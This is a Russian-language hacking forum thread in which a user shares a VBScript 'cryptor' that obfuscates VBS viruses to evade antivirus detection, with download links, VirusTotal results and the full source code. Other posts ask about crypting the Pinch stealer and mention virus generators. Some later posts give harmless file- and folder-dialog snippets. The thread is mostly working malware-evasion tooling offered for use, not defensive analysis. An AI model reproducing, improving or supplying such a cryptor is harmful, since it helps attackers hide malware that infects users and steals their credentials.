Просмотр полной версии : Криптор vbs
Сделал криптор vbs файлов, тока после того как сделал, заметил, что каспер,гад, палит,но на вирустотале его палит тока каспер и еще один какой-то левый антивирь, подумал, может кому понадоботся, ща буду пробовать от каспера скрывать. Криптор написан на vbs.
http://grob-t.narod.ru/Cryptor.vbs
переделал криптор, теперь на вирустотале все молчит как рыба!
качать тут http://grob-t.narod.ru/cryptornew.vbs
Можеш его выложить с расширением .ехе ?
непонял, ты имеешь ввиду скомплированный?скоро выложу, только немного переделаю, чтоб имена файлов надо было самому вводить
PAKOT, выложил в exe http://grob-t.narod.ru/kryptorvbs.rar
пароль grob-t.narod.ru
не понел =((((( а как криптовать то Pinch ? =(((((
это криптор файлов *.vbs, а пинч - это exe, следовательно его этим криптором нельзя закриптовать!
Вот что говорит вирустотал(остальное чисто)
BitDefender 7.2 03.27.2007 Trojan.VBS.Kalmar.Dropper.A (ну и название блин)
Ewido 4.0 03.27.2007 Worm.Ancrist
Panda 9.0.0.4 03.27.2007 Suspicious file
mm..... а че за вирус в фармате .vbs че он делает этот вирус ? блин кто поможет с хорошим криптором фармата .exe ? мне для Pincha =((((
Ссорри за оффтоп, но зачем проверять на вирустотале, он же палиться намного быстрее начнет.
mm..... а че за вирус в фармате .vbs че он делает этот вирус ? блин кто поможет с хорошим криптором фармата .exe ? мне для Pincha =((((
http://forum.antichat.ru/thread35892.html
или
http://damagelab.org/index.php?showtopic=17244
v1ru$, спасибо, что сказал, видимо, все зависит от самого вируса, когда я на вирустотале проверил вирус, сгенеренный на апокалипсисе со всеми настройками, результат был намного хуже чем у тебя, палил даже каспер:)
Вот обновление http://grob-t.narod.ru/Cryptor.vbs , тот же вирь на апокалипсисе определяют только BitDefender:VBS.Alien.B@mm и McAfee:NewScript, сегодня под вечер, а может и раньше немного изменю криптор, если кто заметил, то первый и второй криптор были совсем разные, короче попробую их скрестить, и кстати v1ru$ что ты такое криптовал у меня ни панда ни Ewido ни разу не вякнули
Slapy, vbs вирусы это обычные вирусы делают тоже-самое,что и обычные вирусы написаны на языке Visual Basic Script, если хочешь разобраться скачай какой-нибудь генератор vbs вирусов, их много, русский - apokalipses
не понел =((((( а как криптовать то Pinch ? =(((((
наверное стоит научиться отличать exe от vb
Вот очередное обновление:
Set FSO = CreateObject("Scripting.FileSystemObject")
Set File = FSO.GetFile("C:\temp.vbs")'Тут нужно указать путь к файлу, который надо закриптовать
Set TextStream = File.OpenAsTextStream(1)
While Not TextStream.AtEndOfStream
Str = TextStream.ReadLine()
st=st&replace(str,"""","""""")
st=st&"""&flrcbv&"""
strr=StrReverse(st)
Wend
TextStream.Close
Set TextStream = FSO.CreateTextFile("C:\temp2.vbs")'Сюда будет сохраняться закриптованный файл
TextStream.Writeline "a=StrReverse("""&strr&""")"&vbcrlf&"execute(a)"
TextStream.Close
Правда от BitDefender не удалось скрыть :( , только от McAfee, а, кстати этот антивирь BitDefender, он популярный или нет?
Вроде бит не очень,но пинчи палит криптованые(если паблик криптор)
З.Ы.На вирустотале я проверял сам криптор)
А можеж выложить конечный код (когда уже с формою).Интересно взглянуть.
П.С.Я просто практикуюсь на вб, и хотел бы знать как ты ето зделал.
Вот блин каспер ворчит на хак тулл!!!
Dimi4, это написано на VBS, хотя на vb тоже работать должно, формы помоему не надо
Dimi4, это написано на VBS, хотя на vb тоже работать должно, формы помоему не надо
Ето механическая ошибка, я имел ввиду vbs.Дай код плз, а то я парюсь с BrowseForFolder ничо не катит.
2 Dimi4, это и есть код
Set FSO = CreateObject("Scripting.FileSystemObject")
Set File = FSO.GetFile("C:\temp.vbs")'Тут нужно указать путь к файлу, который надо закриптовать
Set TextStream = File.OpenAsTextStream(1)
While Not TextStream.AtEndOfStream
Str = TextStream.ReadLine()
st=st&replace(str,"""","""""")
st=st&"""&flrcbv&"""
strr=StrReverse(st)
Wend
TextStream.Close
Set TextStream = FSO.CreateTextFile("C:\temp2.vbs")'Сюда будет сохраняться закриптованный файл
TextStream.Writeline "a=StrReverse("""&strr&""")"&vbcrlf&"execute(a)"
TextStream.Close
Да не тот, мне нужен когда вручную вводить путь
Dimi4, теперь понял, а что именно тебе надо, чтоб вылезал обычный inputbox или диалог выбора файла?
диалог выбора файла или паки.Потом штоб инфа кидалась на текст бокс
В vbs нету текстбоксов, они есть в ВБ, кстати вроде выбор файла будет работать только на xp и выше не проверял
выбор файла
Set objDialog = CreateObject("UserAccounts.CommonDialog")
objDialog.Filter = "WSH скрипты (*.vbs, *.js)|*.vbs;*.js|Все файлы (*.*)|*.*"
objDialog.FilterIndex = 2
objDialog.InitialDir = "C:\"
intResult = objDialog.ShowOpen
If intResult = 0 Then
MsgBox "Файл не выбран!", vbInformation
Else
Wscript.Echo objDialog.FileName
End If
выбор папки
On Error Resume Next
Set objShellApp = CreateObject("Shell.Application")
Set objFolder = objShellApp.BrowseForFolder(0, "Выбор папки", 0, "C:\")
MsgBox objFolder.Self.Path, vbInformation
If Err.Number <> 0 Then
MsgBox "Папка не выбрана!", vbInformation
End If
еще один способ выбора файла
Set objDialog = CreateObject("SAFRCFileDlg.FileOpen")
intResult = objDialog.OpenFileOpenDlg
WScript.Echo "Результат операции: " & CStr(intResult)
WScript.Echo "Выбран файл: " & objDialog.FileName
В vbs нету текстбоксов
гы, нету, но ведь можна их сделать с помошью хтмл и внутрь файла вставить код на вижал бейсике, он прекрасно работает в браузере, по крайней мере в ИЕ. Да, расширение уже нуна будет хтм или хтмл поставить. Вот вам и полноценная форма :)
Shred, не, лучше расширение сделать .hta тогда будет похоже на обычную прогу
каспер недавно стал палить криптор, я сделал полиморфный криптор vbs файлов, криптор написан на VB6:
http://grob-t.narod.ru/vbs-cryptor.rar
пасс на архив - 666
блин какая то ошибка выходит типо прошло много времени!!!
sakauri, это из-за пустых строчек в конце твоего файла, обновил ссылку перекачай еще раз
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot